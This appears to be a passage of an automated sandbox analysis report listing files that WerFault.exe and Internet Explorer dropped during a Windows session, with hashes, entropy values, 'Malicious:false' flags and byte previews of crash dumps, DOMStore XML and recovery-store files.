                                                                                                                                                                                                                                  SHA-512:AE2868DABBC1CBD99A4008C136A5FB99E6961C71641401961D10FFEC45621F31BDB889B6938120C39A52DD22D12ABEC9818C38AA99676A49CAEC290D3DCB45AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1160843" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2EE.tmp.dmp
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 10 18:12:48 2021, 0x1205a4 type
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):67414
                                                                                                                                                                                                                                  Entropy (8bit):1.8355342190521222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ErYRSsdJxbb7gR0i7WHxXqZstsDqtUT2RmpPMhfp1fGOGj4nCOFsVwN:9jbxLgZ6HZGutg2RmpPMfFG/4XeVI
                                                                                                                                                                                                                                  MD5:3EA8F72E78A991FA05E5086B3AADBB6F
                                                                                                                                                                                                                                  SHA1:4F916A0B292B43714FBE13671F9106C00C703C8A
                                                                                                                                                                                                                                  SHA-256:83480519D8B1D836CFE843BD8E15B3501F4E992A1CCE102127F602656696E87F
                                                                                                                                                                                                                                  SHA-512:CA64B278F182608D5FE06FF4DD070083C12A1CE55B36EFC45BBA885EE34C0060E9FFC80EDB69990C327CA23B7813BCD9840423D0CF7614155E1BA2F4591F9E35
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: MDMP....... ....... .;a...................U...........B..............GenuineIntelW...........T............;a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFDB.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8288
                                                                                                                                                                                                                                  Entropy (8bit):3.6920049962772135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Rrl7r3GLNilv6ppr6Y/r66DgmfTkOSnCpDz89bMEsf0jkm:RrlsNi96nr6Ye6DgmfTkOSDM3fc
                                                                                                                                                                                                                                  MD5:2140BD66E3553C411015CA227B518CB3
                                                                                                                                                                                                                                  SHA1:EE0CC8570996FA775B70A1BE8C3267C7EE52521D
                                                                                                                                                                                                                                  SHA-256:3B5877F46934968AC98589F9C45F85ED859D027A47A9423C87E3BD667226A6E9
                                                                                                                                                                                                                                  SHA-512:5F08911E5079458F19F6B7DBA4FFD274A7655DDC455D989B51485E2A9C70B816952C3D9194B3AEE6C6918AD0AC195F3BF394B134390110B79E4207D81520DB52
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.3.6.<./.P.i.d.>.......
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IUHEMSR9\contextual.media[1].xml
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2818
                                                                                                                                                                                                                                  Entropy (8bit):4.860107736873418
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:LXY7XY7XYt7T7Tt7T7T7D7DZ7D7D7D7D7DtuYzY7DtuYzY7DtuYzY7DtuYzYC7DJ:8MMt//t//PPZPPPPPtxkPtxkPtxkPtxl
                                                                                                                                                                                                                                  MD5:4A7A9CBCCF88026287DDD5BB618D06EB
                                                                                                                                                                                                                                  SHA1:82CCF71CE61B3EFCCF10B2306531E675AE29A003
                                                                                                                                                                                                                                  SHA-256:084FE39E237AB34B6E52581336F91C0B221B2F69962C0F708E95FE42786A3CC5
                                                                                                                                                                                                                                  SHA-512:059BB8592FE71A6FB777DD02C0B6103EE319D423E709375EDC98ADA59CC423F481E3C106A4066E527B037FFC906ACB4C306473F09929E80A3596CCA923AB4FC7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /><item name="mntest" value="mntest" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /><item name="mntest" value="mntest" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1305540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1305540352" htime="30910063" /><item name="mntest" value="mntest" ltime="1305540352" htime="30910063" /></root><ro
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\T8DRMTJ1\www.msn[2].xml
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                                                                  Entropy (8bit):5.141794268229611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:D90aK1ryRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAevJXXlDOqShWHF8LKb:JFK1rUFkduqswEkIXH40AAehFDihlub
                                                                                                                                                                                                                                  MD5:D4E84B1D417CF0A9E7B8CB26344620B1
                                                                                                                                                                                                                                  SHA1:2DF57AAAF58B5173C0F03A08AB58A34AA1CD8822
                                                                                                                                                                                                                                  SHA-256:A45A06FAFF645A3AFF05F669279E72D93686C5EAD03CDDDC3F1061F978E56F1F
                                                                                                                                                                                                                                  SHA-512:A67BBA3A49E8B7A259A548B70C0718F12DBB1DBF0FEC30E12B18C748FD213C684EE70C3386AB3FA9D382B10180D14007F36976B0DDF6352493BC8D9FFC830A01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <root></root><root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:false,&quot;acceptable&quot;:true}" ltime="1318580352" htime="30910063" /></root>
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{86DBC09F-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):324264
                                                                                                                                                                                                                                  Entropy (8bit):2.5290169599538572
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rkZ6DwLk9aX8bsQnWMtpMnQkRcQ1RTQWRrjn800IEJRPwsZUwDPEiUgXPA/lc3sT:CeEBnVjn8FIsGsk
                                                                                                                                                                                                                                  MD5:35E1E2CC8617D84C17384419AC131CE4
                                                                                                                                                                                                                                  SHA1:44551C1954C02D306DE9948BFB7C556A41E085A7
                                                                                                                                                                                                                                  SHA-256:2D12A619C62DB8BF626B2C4F13A09DF10A6254842E52E8D2140DBD66398E4F17
                                                                                                                                                                                                                                  SHA-512:DD2A3FC0791A759A4F227747E67C781EA0D8A1086D9D96B11D4BDEDD2BB4F2CCC42132D505D1F6466240686EEB327C9DD60481216CFAE92D2C8C8A780B223600
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{86DBC0A1-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198988
                                                                                                                                                                                                                                  Entropy (8bit):3.581577619683556
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:1Z/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kgTzGt1:8/s
                                                                                                                                                                                                                                  MD5:2AF7336C9252C26F3A2475F05B7CAE44
                                                                                                                                                                                                                                  SHA1:15B115CC0C5560AD6EE50D1AF597792517D07117
                                                                                                                                                                                                                                  SHA-256:1CAB27490C0EEBCBC1F0E3615C51F158C3C18A63888C14151436E3516484BC9E
                                                                                                                                                                                                                                  SHA-512:D84F5F30A14DF83276F0D7210C403F12CC869AC672C1275A9ED279F0FB146A771DE2FBACB1022E820DCBFDD3CF00FDEA1199EB6FEFE7EAA745880AE7F0F94774
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D3DD69F-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.5841794956150304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Iw1hGcprmGwpaNhG4pQDGrapbSCGQpKMG7HpRATGIpX2qGApm:r1XZ+QNz6nBSKAnTUFBg
                                                                                                                                                                                                                                  MD5:7AF9208375260C9AA57EF600C9142BFD
                                                                                                                                                                                                                                  SHA1:795ACF9289074C2E7A46363272312400F6624AE0
                                                                                                                                                                                                                                  SHA-256:B494D639C14EFE872B31DCBB9747342A85BE3FCA33EE2227613A941F96EF2A49
                                                                                                                                                                                                                                  SHA-512:4835DC60A2195D5A6917A7EE30ED89E62F887AF5452306B42C7090A1F97B8FE8DE8F82A7D211507BF5BFB5F14FF92AF78BA339B02D482A1F25B2ADF16CD320D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D3DD6A1-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.8712670273613363
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rWZ9Q96jBS6jB2xWfMeOfk0lbpRfk0lcLA:rWZ9Q96jk6jB2xWfMeOV9RV6A
                                                                                                                                                                                                                                  MD5:B6A4CC83589FDC10EED4EF460F3EBB99
                                                                                                                                                                                                                                  SHA1:C432A0A4CEA41BBDE9F566F35D8F3CF723B748C4
                                                                                                                                                                                                                                  SHA-256:F575FB5044D02B87818F3F88514E8DA815C491A13B65FDA50814429E0DE7A9CD
                                                                                                                                                                                                                                  SHA-512:26A05DA5169F24A28BFCB8798FB162E850BF7EF42383E3244AB2607E7F4988F2C33839D9FD42E2DD0EC1F4100086A5F8A62C227B0EFBB8D0EA52F17E563419E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A7FE5F60-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.596621027682327
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwOGcprvGwpaDG4pQPGrapbSoGQpBYGHHpcNTGUpQeTGcpm:rSZZQ16TBSQjX2P6qg
                                                                                                                                                                                                                                  MD5:ACAB1F73E9C1A784ABAA85ED277CAA74
                                                                                                                                                                                                                                  SHA1:536F8DCDA5133AB3C4A908D2B0F998DC635542DC
                                                                                                                                                                                                                                  SHA-256:E3E5A32D24B816C89BCF975C12C58C8A6B797E9E58E143B43BF6F28C0DC7AED4
                                                                                                                                                                                                                                  SHA-512:C726B82E2C9F71C28873D244B306CF97B333D2628D81A5DDC805972180325D59852E077C5D031864E1A50A310C5F54448109370942DB06DBE1CE4C39D0115477
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A7FE5F62-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.8715077371892341
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rIZHQr6NBSUj2lA22i+KW2i/M2i7OIilfVec2RIilfVec+A:rIZHQr6NkUjV2NWjMPOnfA3RnfAjA
                                                                                                                                                                                                                                  MD5:F640E7B349BBCEC0779D1EA3E02FFEF9
                                                                                                                                                                                                                                  SHA1:0E6984B7C6D40C043BEC885B931F78D51882E86A
                                                                                                                                                                                                                                  SHA-256:731B910897FAAE98A520650940DC7CBFF8D941A1A68FAC0C72C228819845E96C
                                                                                                                                                                                                                                  SHA-512:09A8EEE5B041AEB28A23B8B53EE2F9B7C1A8AD1F58FF61AE6ABAA13105A05C8D0B4FEBB109BC41703917535129B472AA6D76AE3CD705F6AC3F80FC6509B48590
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B3BACA1A-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27388
                                                                                                                                                                                                                                  Entropy (8bit):1.8476622684174893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:raZVQ16PBSijReA2RcKWRgMR8OnC3AvRnC3Au3RLA:raZVQ16PkijR2xWCMeOCwvRCwuRA
                                                                                                                                                                                                                                  MD5:5DA71ABA57B63D23AF70830AD3AF3CAC
                                                                                                                                                                                                                                  SHA1:47A9C8E2A9EDCD9B6FAEB2D40F3666508BEAC5CE
                                                                                                                                                                                                                                  SHA-256:AEBB41DEA8527D2ABF77C997B420132309ED02B6E910F7FA655498FA028FAA0A
                                                                                                                                                                                                                                  SHA-512:3C6F0F0393B5F2FC22CAB1D4B4AB26297CA722F3B736BE96B12F3F19E33023123F2758088782C15293E734FA72B6A2AD0EC8432053338BFF32B7630A4EBE463C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B3BACA1C-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                                                  Entropy (8bit):1.867268120754995
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r2ZlQt6kk3jd2NWBMFWi+tYqVOxi+tYqbOA:ryaYJzUkakVthVyVthV
                                                                                                                                                                                                                                  MD5:B352AF3ADC4123C3D70190438EB049A3
                                                                                                                                                                                                                                  SHA1:17106369ACE23E76E39E178D17CAE439FD1AF9F8
                                                                                                                                                                                                                                  SHA-256:FD6F0039DCD440D004893AC493E6473CB9A6121C9407938B9D0FCC165FBA6841
                                                                                                                                                                                                                                  SHA-512:9C33E4A8B8081CDE748EE32A8A7C7AC16E034043B0FEA7EF90A814EAE0A6EB9BFA0DF09E54E774ED9EB7074B2B6F9BEDF1FCF85797826F556CC1A512AB455FCA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BC00BC63-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                                                  Entropy (8bit):1.8681860048424832
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rkZxVQz6pBSCjZ2tWgMoWS/pvGOxS/pvN0A:rkZHQz6pkCjZ2tWgMoWyGOxyiA
                                                                                                                                                                                                                                  MD5:FA48D92053E13D4D004844DEC0FF13D4
                                                                                                                                                                                                                                  SHA1:0E36358356F1821D11AA5A80E2EC9F5C193114B7
                                                                                                                                                                                                                                  SHA-256:BA8AA4A3D2785BC2D77C48BDB0C96A70E18BC69B5B0FD73A9C1B6DA93F957E3A
                                                                                                                                                                                                                                  SHA-512:7A9CEB61256832CF2F3D7D22532612AD9BA62965A1BE98E842D993E1F67A0351A628D6C73D8B82140759057822AC755327DA4CD285B351AE865FF546E13F6DEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BC00BC65-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27436
                                                                                                                                                                                                                                  Entropy (8bit):1.8622060300672174
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rCZ9QE6SBSejOu2xWvMH+bHsyxbHsm59CA:rCZ9QE6Skejx2xWvMH+rTxrxCA
                                                                                                                                                                                                                                  MD5:E79EC1F88E5A34C4A84C7B71818B4167
                                                                                                                                                                                                                                  SHA1:976D7C1821F568812F12AF9905CDEBE0D1CD72BC
                                                                                                                                                                                                                                  SHA-256:FD262120FE33AF23E58F36D728A94E5F693B17AD73D0A7341DB28A6C4000916D
                                                                                                                                                                                                                                  SHA-512:140CE96365BEC17E1E4BFC85219CEC850F415FCB379F6E75E96424E532CD3CC395588C2BAF889C8EF045136BF6AFB3A63433B270B089A9AAFEF29CD621EE86FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2038910-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.597220882768176
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwQGcprRGwpa9G4pQ5GrapbS1GQpBiGHHpcfTGUpQ7eGcpm:rUZLQ/6ZBS/j52p6+g
                                                                                                                                                                                                                                  MD5:C00749151674A9E20302F788700F434F
                                                                                                                                                                                                                                  SHA1:54CB0F816441B1D0C0FFB1A41A4467AA55706542
                                                                                                                                                                                                                                  SHA-256:9D40EE72831527FFF0F1D39F7E8D8CE25ED80FE6553B35E1FFFE0E931BF94D12
                                                                                                                                                                                                                                  SHA-512:9163A0782F476914352C409C3E0E8DEC196272712A3C4FE9A1CF2F168D99E80E779E8DD047B137DEBBEEF58DB2D7BFFCB0C3D4DB6E2DA3D345E7EC30BD195524
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2038912-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.873746369311473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwPGcprOGwpa9G4pQpGrapbS6GQpBiGHHpcjHTGUp8jSGzYpmj/aGopMR/b/DWF/:rFZmQ/6JBSCj52FWCM+Om8Rm6A
                                                                                                                                                                                                                                  MD5:02FB1A94C08DD94A79D36340C03C0E44
                                                                                                                                                                                                                                  SHA1:7303591CDFAF8E08CC45657F961719225AB60FA5
                                                                                                                                                                                                                                  SHA-256:B2FE70BA4450CAED0565413B630B8CBE9C65F75E281EA3E46E09BC4049D39A81
                                                                                                                                                                                                                                  SHA-512:3A1D2BC47A8EFC710549CFD96C0CF3812137FB2DE13F6747C1FAEE5267A33EB02C35221F074D4D52DE717C3D3D046E6BFA7332E99D4CCE2C66741456F2499EC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CB1F148B-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.5966738929262168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Iw/1Gcpr5Gwpa9G4pQFGrapbSxGQpB1ZGHHpc1QTGUpQ16kGcpm:r/rZzQ/61BSLjS2G69g
                                                                                                                                                                                                                                  MD5:F04D0B0E8A12D57A54FC82501498098E
                                                                                                                                                                                                                                  SHA1:D9C841428D7F51668934E4B2AC64AAE340902B42
                                                                                                                                                                                                                                  SHA-256:367ED26965AF39F71F0B7464DD84973F648501945B16DA0130FF50C859B03926
                                                                                                                                                                                                                                  SHA-512:3496EC53137BE0F414B6B1174849DC6AC1F2872E07E1F60E94464E589AD1F1E4EB06A38D29BB7D2FF596C5B499DADBD7FA14EF97819CC65F6677EE07966CC92A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
